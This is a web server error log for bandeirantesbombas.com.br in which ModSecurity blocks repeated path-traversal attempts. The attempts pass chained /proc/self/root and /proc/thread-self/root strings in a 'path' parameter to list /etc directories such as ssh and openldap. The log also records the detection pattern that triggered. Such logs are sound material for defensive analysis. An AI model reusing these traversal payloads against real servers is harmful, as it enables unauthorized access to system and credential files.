https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:44:09.377774 2026] [proxy_fcgi:error] [pid 7437:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:54696] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:44:10.347023 2026] [:error] [pid 7437:tid 140411557287680] [client 74.7.241.31:44740] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmg-geiSKl8TjouI-YjBQAAA9Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:44:15.274436 2026] [:error] [pid 9299:tid 140411699963648] [client 74.7.241.31:44752] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmg_7-sgTmmJoPuMdzAbAAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:44:21.440738 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.243.128:54762] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmhBdY0UrI5A3LftIwH4gAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:44:23.489315 2026] [:error] [pid 18380:tid 140411691570944] [client 74.7.243.128:58040] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmhB64xEDsg_V3ESNZWDgAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:44:31.122578 2026] [proxy_fcgi:error] [pid 17965:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:55194] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:44:33.811308 2026] [:error] [pid 9299:tid 140411624429312] [client 74.7.241.31:44754] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmhEb-sgTmmJoPuMdzAdgAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:44:53.129800 2026] [proxy_fcgi:error] [pid 18380:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:55710] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:45:16.145797 2026] [proxy_fcgi:error] [pid 7004:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:56274] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:45:24.888881 2026] [core:alert] [pid 2598:tid 140411607643904] [client 74.7.243.128:58926] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/lib/kbd/consolefonts
[Tue Mar 17 15:45:38.134053 2026] [proxy_fcgi:error] [pid 18380:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:56746] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:46:00.149783 2026] [proxy_fcgi:error] [pid 2598:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:57116] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:46:01.439078 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.241.31:53286] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmhaQeiSKl8TjouI-YjSgAAA8I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:46:05.273351 2026] [:error] [pid 17965:tid 140411624429312] [client 74.7.241.31:51366] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmhbat8Nd0UC_OcbVHUMQAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:46:15.375564 2026] [:error] [pid 6296:tid 140411607643904] [client 74.7.241.31:51380] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmhd3Ik7brgkOH-rIWVzgAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:46:22.141872 2026] [proxy_fcgi:error] [pid 2473:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:57730] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:46:44.126677 2026] [proxy_fcgi:error] [pid 7437:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:58208] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:47:11.033817 2026] [proxy_fcgi:error] [pid 2598:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:58852] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:47:32.118142 2026] [proxy_fcgi:error] [pid 9299:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:59312] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:47:54.139598 2026] [proxy_fcgi:error] [pid 7437:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:59820] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:48:16.125806 2026] [proxy_fcgi:error] [pid 7437:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:60382] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:48:37.131370 2026] [proxy_fcgi:error] [pid 17965:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:60880] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:48:46.369162 2026] [:error] [pid 7437:tid 140411590858496] [client 74.7.241.31:53764] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmiDgeiSKl8TjouI-YjowAAA9I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:49:00.098553 2026] [proxy_fcgi:error] [pid 7004:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:33154] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:49:16.192088 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.241.31:48176] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmiLNY0UrI5A3LftIwIZAAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:49:22.129838 2026] [proxy_fcgi:error] [pid 29151:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:33674] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:49:44.093989 2026] [proxy_fcgi:error] [pid 17965:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:34144] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:50:06.161819 2026] [proxy_fcgi:error] [pid 9299:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:34608] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:50:06.501433 2026] [:error] [pid 7004:tid 140411590858496] [client 74.7.241.31:55592] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmiXcU6Sx0TG1YjmQi6MwAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:50:10.958679 2026] [:error] [pid 7004:tid 140411624429312] [client 74.7.241.31:57722] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmiYsU6Sx0TG1YjmQi6PwAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:50:13.871326 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.241.31:57726] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmiZQeiSKl8TjouI-YjwgAAA8I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:50:33.369828 2026] [proxy_fcgi:error] [pid 2473:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:35170] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:50:43.208254 2026] [:error] [pid 29151:tid 140411658000128] [client 74.7.241.31:57740] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmig_PqhzTj3BvfDX-TCwAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:50:43.887478 2026] [:error] [pid 29151:tid 140411616036608] [client 74.7.241.31:57740] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmig_PqhzTj3BvfDX-TDAAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:50:55.138190 2026] [proxy_fcgi:error] [pid 2598:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:35706] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:51:08.869856 2026] [mime_magic:error] [pid 6296:tid 140411725141760] (70014)End of file found: [client 74.7.243.128:40822] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/sys/fs/cgroup/systemd/system.slice/node_exporter.service
[Tue Mar 17 15:51:08.870039 2026] [access_compat:error] [pid 6296:tid 140411725141760] [client 74.7.243.128:40822] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/sys/fs/cgroup/systemd/system.slice/node_exporter.service
[Tue Mar 17 15:51:17.132176 2026] [proxy_fcgi:error] [pid 17965:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:36258] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:51:23.027685 2026] [:error] [pid 7437:tid 140411641214720] [client 74.7.243.128:42194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmiqweiSKl8TjouI-Yj2AAAA8w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:51:24.808707 2026] [:error] [pid 9299:tid 140411683178240] [client 74.7.243.128:35592] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmirL-sgTmmJoPuMdzBGAAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:51:26.276573 2026] [:error] [pid 6296:tid 140411666392832] [client 74.7.243.128:35598] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmirnIk7brgkOH-rIWWpAAAAUk"], referer: 